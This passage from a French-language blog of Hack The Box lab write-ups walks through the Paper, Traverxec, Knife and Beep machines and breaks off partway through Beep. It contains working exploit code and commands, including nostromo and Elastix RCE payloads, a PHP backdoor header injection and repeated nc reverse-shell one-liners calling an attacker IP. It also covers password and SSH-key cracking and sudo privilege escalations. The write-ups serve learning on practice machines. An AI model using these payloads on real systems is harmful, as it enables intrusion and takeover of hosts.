passe de rocketchat fonctionne pour l\u0026rsquo;utilisateur dwight en ssh: dwight : Queenofblad3s!23\n1 2 3 4 5 6 7 8 9 ssh dwight@office.paper dwight@office.paper\u0026#39;s password: Activate the web console with: systemctl enable --now cockpit.socket Last failed login: Thu Jan 30 18:24:37 EST 2025 from 10.10.14.42 on ssh:notty There were 3 failed login attempts since the last successful login. Last login: Tue Feb 1 09:14:33 2022 from 10.10.14.23 [dwight@paper ~]$ cat user.txt 4419.....697b Privilege Escalation CVE-2021-3560 : polkit Avec linpeas, on trouve une elevation de privilege grâce à une faille dans l\u0026rsquo;outil polkit, CVE-2021-3560\n1 2 3 4 ./linpeas.sh ... Vulnerable to CVE-2021-3560 ... On trouve un poc sur github avec un script .sh : https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation\nAu début il ne fonctionne pas, le mot de passe du nouveau user crée doit etre équivalent a l\u0026rsquo;actuel mais ça n\u0026rsquo;était pas le cas. En précisant le parametre -p=a, l\u0026rsquo;exploit fonctionne, pas de problème. (Je précise car j\u0026rsquo;ai abandonné cette CVE à cause de ça\u0026hellip; Je pensais que ce n\u0026rsquo;était pas la solution de la boxe.)\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 [dwight@paper ~]$ ./exploit.sh -p=a [!] Username set as : secnigma [!] No Custom Timing specified. [!] Timing will be detected Automatically [!] Force flag not set. [!] Vulnerability checking is ENABLED! [!] Starting Vulnerability Checks... [!] Checking distribution... [!] Detected Linux distribution as \u0026#34;centos\u0026#34; [!] Checking if Accountsservice and Gnome-Control-Center is installed [+] Accounts service and Gnome-Control-Center Installation Found!! [!] Checking if polkit version is vulnerable [+] Polkit version appears to be vulnerable!! [!] Starting exploit... [!] Inserting Username secnigma... Error org.freedesktop.Accounts.Error.PermissionDenied: Authentication is required [+] Inserted Username secnigma with UID 1005! [!] Inserting password hash... [!] It looks like the password insertion was succesful! [!] Try to login as the injected user using su - secnigma [!] When prompted for password, enter your password [!] If the username is inserted, but the login fails; try running the exploit again. [!] If the login was succesful,simply enter \u0026#39;sudo bash\u0026#39; and drop into a root shell! [dwight@paper ~]$ su - secnigma Password: [secnigma@paper ~]$ whoami secnigma [secnigma@paper ~]$ sudo bash [sudo] password for secnigma: [root@paper secnigma]# cat /root/root.txt ccbf.....2804 ","date":"2025-02-01T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/paper-htb/","title":"HTB | Paper"},{"content":" Machine name OS IP Difficulty Traverxec Linux 10.10.10.165 Easy Users david : Nowonly4me\nEnumeration nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 ┌──(kali㉿kali)-[~] └─$ nmap -sC -sV -An -T4 -vvv 10.10.10.165 PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0) | ssh-hostkey: | 2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDVWo6eEhBKO19Owd6sVIAFVCJjQqSL4g16oI/DoFwUo+ubJyyIeTRagQNE91YdCrENXF2qBs2yFj2fqfRZy9iqGB09VOZt6i8oalpbmFwkBDtCdHoIAZbaZFKAl+m1UBell2v0xUhAy37Wl9BjoUU3EQBVF5QJNQqvb/mSqHsi5TAJcMtCpWKA4So3pwZcTatSu5x/RYdKzzo9fWSS6hjO4/hdJ4BM6eyKQxa29vl/ea1PvcHPY5EDTRX5RtraV9HAT7w2zIZH5W6i3BQvMGEckrrvVTZ6Ge3Gjx00ORLBdoVyqQeXQzIJ/vuDuJOH2G6E/AHDsw3n5yFNMKeCvNNL | 256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLpsS/IDFr0gxOgk9GkAT0G4vhnRdtvoL8iem2q8yoRCatUIib1nkp5ViHvLEgL6e3AnzUJGFLI3TFz+CInilq4= | 256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGJ16OMR0bxc/4SAEl1yiyEUxC3i/dFH7ftnCU7+P+3s 80/tcp open http syn-ack nostromo 1.9.6 | http-methods: |_ Supported Methods: GET HEAD POST |_http-server-header: nostromo 1.9.6 |_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34 |_http-title: TRAVERXEC Foothold cve2019-16278 - RCE Detail: Directory Traversal in the function http_verify in nostromo nhttpd through 1.9.6 allows an attacker to achieve remote code execution via a crafted HTTP request. On peut se balader dans le PATH avec des \u0026ldquo;../\u0026rdquo; jusqu\u0026rsquo;a atteindre le binaire \u0026ldquo;/bin/sh\u0026rdquo; et executer n\u0026rsquo;importe quelle commande.\nL\u0026rsquo;exploit est défini comme suit:\n1 2 3 4 5 6 7 def cve(target, port, cmd): soc = socket.socket() soc.connect((target, int(port))) payload = \u0026#39;POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\\r\\nContent-Length: 1\\r\\n\\r\\necho\\necho\\n{} 2\u0026gt;\u0026amp;1\u0026#39;.format(cmd) soc.send(payload) receive = connect(soc) print(receive) 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 ┌──(kali㉿kali)-[~/htb/Traverxec] └─$ python2 47837.py 10.10.10.165 80 \u0026#34;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2\u0026gt;\u0026amp;1|nc 10.10.16.6 1337 \u0026gt;/tmp/f\u0026#34; _____-2019-16278 _____ _______ ______ _____\\ _____\\ \\_\\ | | | / / | | / /| || / / /|/ / /___/| / / /____/||\\ \\ \\ |/| |__ |___|/ | | |____|/ \\ \\ \\ | | | | | _____ \\| \\| | | __/ __ |\\ \\|\\ \\ |\\ /| |\\ \\ / | \\_____\\| | | \\_______/ | | \\____\\/ | | | /____/| \\ | | / | | |____/| \\|_____| || \\|_____|/ \\|____| | | |____|/ |___|/ -------------------------------------- ┌──(kali㉿kali)-[~] └─$ nc -lnvp 1337 listening on [any] 1337 ... connect to [10.10.16.6] from (UNKNOWN) [10.10.10.165] 57934 bash: cannot set terminal process group (444): Inappropriate ioctl for device bash: no job control in this shell www-data@traverxec:/usr/bin$ python3 -c \u0026#39;import pty;pty.spawn(\u0026#34;/bin/bash\u0026#34;)\u0026#39; python3 -c \u0026#39;import pty;pty.spawn(\u0026#34;/bin/bash\u0026#34;)\u0026#39; www-data@traverxec:/usr/bin$ export TERM=xterm export TERM=xterm www-data@traverxec:/usr/bin$ ^Z zsh: suspended nc -lnvp 1337 ┌──(kali㉿kali)-[~] └─$ stty raw -echo; fg [1] + continued nc -lnvp 1337 www-data@traverxec:/usr/bin$ david user infos - conf nostromo En fouillant dans les dossier de l\u0026rsquo;application web \u0026ldquo;nostromo\u0026rdquo;, on trouve un fichier de configuration. Il nous indique un fichier d\u0026rsquo;authentification \u0026ldquo;/var/nostromo/conf/.htpasswd\u0026rdquo;. On y retrouve le mot de passe de l\u0026rsquo;utilisateur david :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 www-data@traverxec:/var/nostromo/conf$ cat nhttpd.conf ## MAIN [MANDATORY] servername traverxec.htb serverlisten * serveradmin david@traverxec.htb serverroot /var/nostromo servermimes conf/mimes docroot /var/nostromo/htdocs docindex index.html ## LOGS [OPTIONAL] logpid logs/nhttpd.pid ## SETUID [RECOMMENDED] user www-data ## BASIC AUTHENTICATION [OPTIONAL] htaccess .htaccess htpasswd /var/nostromo/conf/.htpasswd ## ALIASES [OPTIONAL] /icons /var/nostromo/icons ## HOMEDIRS [OPTIONAL] homedirs /home homedirs_public public_www www-data@traverxec:/var/nostromo/conf$ cat /var/nostromo/conf/.htpasswd david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/ On utilise hashcat pour casser le mot de passe :\n1 2 hashcat -m 500 hash.txt ~/wordlists/rockyou.txt -O -w 3 --show $1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/:Nowonly4me Credentials de david ? david : Nowonly4me ?\nIl semble qu\u0026rsquo;un dossier de david est accessible, comme préciser dans la configuration de nostromo \u0026ldquo;public_www\u0026rdquo;. On y découvre une archive .tgz du nom de \u0026ldquo;backup-ssh-identity-files.tgz\u0026rdquo;.\n1 2 3 4 5 6 7 8 9 10 11 12 www-data@traverxec:/home/david$ cd public_www www-data@traverxec:/home/david/public_www$ ls index.html protected-file-area www-data@traverxec:/home/david/public_www$ cd protected-file-area/ www-data@traverxec:/home/david/public_www/protected-file-area$ ls backup-ssh-identity-files.tgz ... cd /tmp tar -xvfz ... ... www-data@traverxec:/tmp/home/david/.ssh$ ls authorized_keys id_rsa id_rsa.pub On trouve une paire de clés SSH.\nssh2john - cracking ssh key file On trouve le mot de passe de la clé ssh. Password: hunter\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 ┌──(kali㉿kali)-[~/htb/Traverxec] └─$ ssh2john ./id_rsa ./id_rsa:$sshng$1$16$477EEFFBA56F9D283D349033D5D08C4F$1200$b1ec9e1ff7de1b5f5395468c76f1d92bfdaa7f2f29c3076bf6c83be71e213e9249f186ae856a2b08de0b3c957ec1f086b6e8813df672f993e494b90e9de220828aee2e45465b8938eb9d69c1e9199e3b13f0830cde39dd2cd491923c424d7dd62b35bd5453ee8d24199c733d261a3a27c3bc2d3ce5face868cfa45c63a3602bda73f08e87dd41e8cf05e3bb917c0315444952972c02da4701b5da248f4b1725fc22143c7eb4ce38bb81326b92130873f4a563c369222c12f2292fac513f7f57b1c75475b8ed8fc454582b1172aed0e3fcac5b5850b43eee4ee77dbedf1c880a27fe906197baf6bd005c43adbf8e3321c63538c1abc90a79095ced7021cbc92ffd1ac441d1dd13b65a98d8b5e4fb59ee60fcb26498729e013b6cff63b29fa179c75346a56a4e73fbcc8f06c8a4d5f8a3600349bb51640d4be260aaf490f580e3648c05940f23c493fd1ecb965974f464dea999865cfeb36408497697fa096da241de33ffd465b3a3fab925703a8e3cab77dc590cde5b5f613683375c08f779a8ec70ce76ba8ecda431d0b121135512b9ef486048052d2cfce9d7a479c94e332b92a82b3d609e2c07f4c443d3824b6a8b543620c26a856f4b914b38f2cfb3ef6780865f276847e09fe7db426e4c319ff1e810aec52356005aa7ba3e1100b8dd9fa8b6ee07ac464c719d2319e439905ccaeb201bae2c9ea01e08ebb9a0a9761e47b841c47d416a9db2686c903735ebf9e137f3780b51f2b5491e50aea398e6bba862b6a1ac8f21c527f852158b5b3b90a6651d21316975cd543709b3618de2301406f3812cf325d2986c60fdb727cadf3dd17245618150e010c1510791ea0bec870f245bf94e646b72dc9604f5acefb6b28b838ba7d7caf0015fe7b8138970259a01b4793f36a32f0d379bf6d74d3a455b4dd15cda45adcfdf1517dca837cdaef08024fca3a7a7b9731e7474eddbdd0fad51cc7926dfbaef4d8ad47b1687278e7c7474f7eab7d4c5a7def35bfa97a44cf2cf4206b129f8b28003626b2b93f6d01aea16e3df597bc5b5138b61ea46f5e1cd15e378b8cb2e4ffe7995b7e7e52e35fd4ac6c34b716089d599e2d1d1124edfb6f7fe169222bc9c6a4f0b6731523d436ec2a15c6f147c40916aa8bc6168ccedb9ae263aaac078614f3fc0d2818dd30a5a113341e2fcccc73d421cb711d5d916d83bfe930c77f3f99dba9ed5cfcee020454ffc1b3830e7a1321c369380db6a61a757aee609d62343c80ac402ef8abd56616256238522c57e8db245d3ae1819bd01724f35e6b1c340d7f14c066c0432534938f5e3c115e120421f4d11c61e802a0796e6aaa5a7f1631d9ce4ca58d67460f3e5c1cdb2c5f6970cc598805abb386d652a0287577c453a159bfb76c6ad4daf65c07d386a3ff9ab111b26ec2e02e5b92e184e44066f6c7b88c42ce77aaa918d2e2d3519b4905f6e2395a47cad5e2cc3b7817b557df3babc30f799c4cd2f5a50b9f48fd06aaf435762062c4f331f989228a6460814c1c1a777795104143630dc16b79f51ae2dd9e008b4a5f6f52bb4ef38c8f5690e1b426557f2e068a9b3ef5b4fe842391b0af7d1e17bfa43e71b6bf16718d67184747c8dc1fcd1568d4b8ebdb6d55e62788553f4c69d128360b407db1d278b5b417f4c0a38b11163409b18372abb34685a30264cdfcf57655b10a283ff0 ┌──(kali㉿kali)-[~/htb/Traverxec] └─$ vim a ┌──(kali㉿kali)-[~/htb/Traverxec] └─$ john a --wordlist=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes Cost 2 (iteration count) is 1 for all loaded hashes Will run 2 OpenMP threads Press \u0026#39;q\u0026#39; or Ctrl-C to abort, almost any other key for status hunter (?) 1g 0:00:00:00 DONE (2025-01-22 09:34) 20.00g/s 2880p/s 2880c/s 2880C/s carolina..sandra Use the \u0026#34;--show\u0026#34; option to display all of the cracked passwords reliably Session completed. David access - user flag 1 2 3 4 5 6 ┌──(kali㉿kali)-[~/htb/Traverxec] └─$ ssh david@traverxec.htb -i id_rsa Enter passphrase for key \u0026#39;id_rsa\u0026#39;: hunter Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64 david@traverxec:~$ whoami david Bonus: delete password on ssh key 1 2 3 4 5 6 ┌──(kali㉿kali)-[~/htb/Traverxec] └─$ ssh-keygen -p -f ./id_rsa Enter old passphrase: hunter Enter new passphrase (empty for no passphrase): (empty) Enter same passphrase again: (empty) Your identification has been saved with the new passphrase. Privilege Escalation server-stats.sh Dans le script server-stats.sh on observe une commande qui peut etre executé en tant que root sans mot de passe pour david. Cela utilise le binaire journalctl pour afficher des logs.\n1 2 3 4 5 6 7 8 9 10 11 david@traverxec:~/bin$ cat server-stats.sh #!/bin/bash cat /home/david/bin/server-stats.head echo \u0026#34;Load: `/usr/bin/uptime`\u0026#34; echo \u0026#34; \u0026#34; echo \u0026#34;Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`\u0026#34; echo \u0026#34;Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`\u0026#34; echo \u0026#34; \u0026#34; echo \u0026#34;Last 5 journal log lines:\u0026#34; /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat exploit journalctl (gtfobins) Sur gtfobins on trouve un moyen d\u0026rsquo;exploiter ce binaire. En effet, journalctl utilise \u0026ldquo;less\u0026rdquo; pour afficher les données. Or less peut etre exploiter, en marquant \u0026ldquo;!/bin/sh\u0026rdquo; on peut ouvrir un shell a l\u0026rsquo;interieur du programme, ce qui nous donne un accès root. CEPENDANT !! Quand je suis connecté en ssh a david, la commande journalctl n\u0026rsquo;executait pas avec less. Ou alors le less se stoppait instantanément, donc imporssible de faire l\u0026rsquo;exploit\u0026hellip;\nAprès vérification de la solution, en se connectant en ssh depuis le shell obtenu avec le user www-data, less est bien executé\u0026hellip; Et on peut faire l\u0026rsquo;exploit. Je pense qu\u0026rsquo;il s\u0026rsquo;agit d\u0026rsquo;un probleme dans l\u0026rsquo;environnement du shell utiliser qui doit etre différent. Au niveau des variables qui permette le pagineur utilisé par journalctl.\nhttps://gtfobins.github.io/gtfobins/journalctl/\n1 2 3 4 5 6 7 8 9 10 11 12 david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service -- Logs begin at Wed 2025-01-22 07:27:34 EST, end at Thu 2025-01-23 03:55:56 EST Jan 22 08:09:14 traverxec su[1018]: pam_unix(su-l:auth): authentication failure; Jan 22 08:09:16 traverxec su[1018]: FAILED SU (to root) www-data on pts/0 Jan 22 08:15:57 traverxec su[1055]: pam_unix(su:auth): authentication failure; l Jan 22 08:15:59 traverxec su[1055]: FAILED SU (to david) www-data on pts/0 Jan 22 09:07:03 traverxec nhttpd[1201]: /../../../../bin/sh sent a bad cgi heade !/bin/sh # whoami root # cat /root/root.txt ad59.....6f01 ","date":"2025-01-23T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/traverxec-htb/","title":"HTB | Traverxec"},{"content":" Machine name OS IP Difficulty Knife Linux 10.10.10.242 Easy Enumeration nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 $ nmap -sC -sV -An -T4 -vvv 10.10.10.242 PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA) | ssh-rsa AAAAB3NzaC1yc2EA... | 256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA) | ecdsa-sha2-nistp256 AAAAE2.... | 256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519) |_ssh-ed25519 AAAAC3NzaC1l.... 80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu)) |_http-title: Emergent Medical Idea | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.41 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Foothold PHP 8.1.0-dev (RCE) Avec burp, on observe que le serveur utilise la version 8.1.0-dev de php. Avec searchsploit, on voit qu\u0026rsquo;il existe une RCE sur cette version de php :\n1 2 3 4 ┌──(kali㉿kali)-[~] └─$ searchsploit 8.1.0-dev PHP 8.1.0-dev - \u0026#39;User-Agentt\u0026#39; Remote Code Execution | php/webapps/49933.py Exploit from searchsploit On peut utiliser un script python pour exploiter la vuln:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 ┌──(kali㉿kali)-[~/htb/Knife] └─$ python3 49933.py Enter the full host url: http://knife.htb Interactive shell is opened on http://knife.htb Can\u0026#39;t acces tty; job crontol turned off. $ whoami james $ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2\u0026gt;\u0026amp;1|nc 10.10.16.6 1337 \u0026gt;/tmp/f ------------------------------------ ┌──(kali㉿kali)-[~] └─$ nc -lnvp 1337 listening on [any] 1337 ... connect to [10.10.16.6] from (UNKNOWN) [10.10.10.242] 60424 bash: cannot set terminal process group (1025): Inappropriate ioctl for device bash: no job control in this shell james@knife:/$ whoami whoami james Exploit from Burp La vulnérabilité consiste à ajouter une variable \u0026ldquo;User-Agentt\u0026rdquo;, avec 2 \u0026ldquo;t\u0026rdquo;, et d\u0026rsquo;écrire la commande a executé dans la fonction \u0026ldquo;zerodiumsystem(\u0026lsquo;COMMANDE_ICI\u0026rsquo;)\u0026rdquo; :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 ## FROM BURP : GET / HTTP/1.1 Host: knife.htb User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 User-Agentt: zerodiumsystem(\u0026#39;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2\u0026gt;\u0026amp;1|nc 10.10.16.6 1337 \u0026gt;/tmp/f\u0026#39;); Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: close Upgrade-Insecure-Requests: 1 --------------------------------- ┌──(kali㉿kali)-[~/htb/Knife] └─$ nc -lnvp 1337 listening on [any] 1337 ... connect to [10.10.16.6] from (UNKNOWN) [10.10.10.242] 60498 bash: cannot set terminal process group (1025): Inappropriate ioctl for device bash: no job control in this shell james@knife:/$ python3 -c \u0026#34;import pty;pty.spawn(\u0026#39;/bin/bash\u0026#39;)\u0026#34; python3 -c \u0026#34;import pty;pty.spawn(\u0026#39;/bin/bash\u0026#39;)\u0026#34; james@knife:/$ export TERM=xterm export TERM=xterm james@knife:/$ ^Z zsh: suspended nc -lnvp 1337 ┌──(kali㉿kali)-[~/htb/Knife] └─$ stty raw -echo; fg [1] + continued nc -lnvp 1337 james@knife:/$ whoami james james@knife:/$ cd james@knife:~$ cat user.txt 4819.....4e49f Privilege Escalation Knife Binary exploit Avec sudo -l, on observe que l\u0026rsquo;on peut executer le binaire knife en tant que root. Sur gtfobins, on trouve rapidement une exploit pour faire une élévation de privilège avec ce binaire.\nVoici le lien exacte de la page : https://gtfobins.github.io/gtfobins/knife/\n1 2 3 4 5 6 7 8 9 10 11 12 13 james@knife:/home$ sudo -l Matching Defaults entries for james on knife: env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin User james may run the following commands on knife: (root) NOPASSWD: /usr/bin/knife james@knife:/home$ sudo knife exec -E \u0026#39;exec \u0026#34;/bin/sh\u0026#34;\u0026#39; # whoami root # cd /root # cat root.txt 3db8b.....ce60 ","date":"2025-01-22T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/knife-htb/","title":"HTB | Knife"},{"content":" Machine name OS IP Difficulty Beep Linux 10.10.10.7 Easy Enumeration nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 ┌──(kali㉿kali)-[~] └─$ sudo nmap -sS -sC -sV -An -vvv -T4 10.10.10.7 PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 4.3 (protocol 2.0) | ssh-hostkey: | 1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA) | ssh-dss AAAAB3NzaC1kc3MAAACBAI04jN+Sn7/9f2k+5UteAWn8KKj3FRGuF4LyeDmo/xxuHgSsdCjYuWtNS8m7stqgNH5edUu8vZ0pzF/quX5kphWg/UOz9weGeGyzde5lfb8epRlTQ2kfbP00l+kq9ztuWaXOsZQGcSR9iKE4lLRJhRCLYPaEbuxKnYz4WhAv4yD5AAAAFQDXgQ9BbvoxeDahe/ksAac2ECqflwAAAIEAiGdIue6mgTfdz/HikSp8DB6SkVh4xjpTTZE8L/HOVpTUYtFYKYj9eG0W1WYo+lGg6SveATlp3EE/7Y6BqdtJNm0RfR8kihoqSL0VzKT7myerJWmP2EavMRPjkbXw32fVBdCGjBqMgDl/QSEn2NNDu8OAyQUVBEHrE4xPGI825qgAAACANnqx2XdVmY8agjD7eFLmS+EovCIRz2+iE+5chaljGD/27OgpGcjdZNN+xm85PPFjUKJQuWmwMVTQRdza6TSp9vvQAgFh3bUtTV3dzDCuoR1D2Ybj9p/bMPnyw62jgBPxj5lVd27LTBi8IAH2fZnct7794Y3Ge+5r4Pm8Qbrpy68= | 2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA) |_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA4SXumrUtyO/pcRLwmvnF25NG/ozHsxSVNRmTwEf7AYubgpAo4aUuvhZXg5iymwTcZd6vm46Y+TX39NQV/yT6ilAEtLbrj1PLjJl+UTS8HDIKl6QgIb1b3vuEjbVjDj1LTq0Puzx52Es0/86WJNRVwh4c9vN8MtYteMb/dE2Azk0SQMtpBP+4Lul4kQrNwl/qjg+lQ7XE+NU7Va22dpEjLv/TjHAKImQu2EqPsC99sePp8PP5LdNbda6KHsSrZXnK9hqpxnwattPHT19D94NHVmMHfea9gXN3NCI3NVfDHQsxhqVtR/LiZzpbKHldFU0lfZYH1aTdBfxvMLrVhasZcw== 25/tcp open smtp syn-ack ttl 63 Postfix smtpd |_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN 80/tcp open http syn-ack ttl 63 Apache httpd 2.2.3 |_http-server-header: Apache/2.2.3 (CentOS) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-title: Did not follow redirect to https://10.10.10.7/ 110/tcp open pop3 syn-ack ttl 63 Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 |_pop3-capabilities: RESP-CODES TOP APOP LOGIN-DELAY(0) USER PIPELINING IMPLEMENTATION(Cyrus POP3 server v2) STLS AUTH-RESP-CODE UIDL EXPIRE(NEVER) 111/tcp open rpcbind syn-ack ttl 63 2 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2 111/tcp rpcbind | 100000 2 111/udp rpcbind | 100024 1 790/udp status |_ 100024 1 793/tcp status 143/tcp open imap syn-ack ttl 63 Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 |_imap-capabilities: Completed MAILBOX-REFERRALS IMAP4 RIGHTS=kxte QUOTA OK ANNOTATEMORE BINARY SORT=MODSEQ X-NETSCAPE LIST-SUBSCRIBED UIDPLUS LISTEXT IMAP4rev1 CHILDREN STARTTLS IDLE NAMESPACE SORT CONDSTORE ID ACL CATENATE NO RENAME THREAD=REFERENCES LITERAL+ URLAUTHA0001 MULTIAPPEND THREAD=ORDEREDSUBJECT ATOMIC UNSELECT 443/tcp open ssl/http syn-ack ttl 63 Apache httpd 2.2.3 ((CentOS)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS | http-robots.txt: 1 disallowed entry |_/ |_http-favicon: Unknown favicon MD5: 80DCC71362B27C7D0E608B0890C05E9F |_ssl-date: 2025-01-20T14:02:51+00:00; +7m26s from scanner time. |_http-title: Elastix - Login page |_http-server-header: Apache/2.2.3 (CentOS) | ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--/organizationalUnitName=SomeOrganizationalUnit/localityName=SomeCity/emailAddress=root@localhost.localdomain | Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--/organizationalUnitName=SomeOrganizationalUnit/localityName=SomeCity/emailAddress=root@localhost.localdomain | Public Key type: rsa | Public Key bits: 1024 | Signature Algorithm: sha1WithRSAEncryption | Not valid before: 2017-04-07T08:22:08 | Not valid after: 2018-04-07T08:22:08 | MD5: 621a:82b6:cf7e:1afa:5284:1c91:60c8:fbc8 | SHA-1: 800a:c6e7:065e:1198:0187:c452:0d9b:18ef:e557:a09f | -----BEGIN CERTIFICATE----- | MIIEDjCCA3egAwIBAgICfVUwDQYJKoZIhvcNAQEFBQAwgbsxCzAJBgNVBAYTAi0t | MRIwEAYDVQQIEwlTb21lU3RhdGUxETAPBgNVBAcTCFNvbWVDaXR5MRkwFwYDVQQK | ExBTb21lT3JnYW5pemF0aW9uMR8wHQYDVQQLExZTb21lT3JnYW5pemF0aW9uY... |_-----END CERTIFICATE----- 993/tcp open ssl/imap syn-ack ttl 63 Cyrus imapd |_imap-capabilities: CAPABILITY 995/tcp open pop3 syn-ack ttl 63 Cyrus pop3d 3306/tcp open mysql syn-ack ttl 63 MySQL (unauthorized) 4445/tcp open upnotifyp? syn-ack ttl 63 10000/tcp open http syn-ack ttl 63 MiniServ 1.570 (Webmin httpd) |_http-favicon: Unknown favicon MD5: 74F7F6F633A027FA3EA36F05004C9341 | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-title: Site doesn\u0026#39;t have a title (text/html; Charset=iso-8859-1). Foothold Elastix - RCE On trouve une exploit sur github sur Elastix. Dans le code fournit par searchsploit, l\u0026rsquo;extension utilisé pour faire un call sur le php est \u0026ldquo;1000\u0026rdquo;. Il fallait retrouver que la bonne extension est \u0026ldquo;233\u0026rdquo; pour cette machine. Pour les autres valeurs, le call ne fonctionne pas et renvoie une erreur. Ensuite, on peut exploiter la RCE.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 $ cat final_exploit.py #exploit modified by infosecjunky #https://infosecjunky.com import urllib2 import ssl rhost=\u0026#34;10.10.10.7\u0026#34; lhost=\u0026#34;10.10.16.2\u0026#34; lport=1337 extension=\u0026#34;233\u0026#34; ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1) ctx.check_hostname = False ctx.verify_mode = ssl.CERT_NONE # Reverse shell payload url = \u0026#39;https://\u0026#39;+str(rhost)+\u0026#39;/recordings/misc/callme_page.php?action=c\u0026amp;callmenum=\u0026#39;+str(extension)+\u0026#39;@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22\u0026#39;+str(lhost)+\u0026#39;%3a\u0026#39;+str(lport)+\u0026#39;%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A\u0026#39; urllib2.urlopen(url,context=ctx) # On Elastix, once we have a shell, we can escalate to root: # root@bt:~# nc -lvp 443 # listening on [any] 443 ... # connect to [172.16.254.223] from voip [172.16.254.72] 43415 # id # uid=100(asterisk) gid=101(asterisk) # sudo nmap --interactive # Starting Nmap V. 4.11 ( 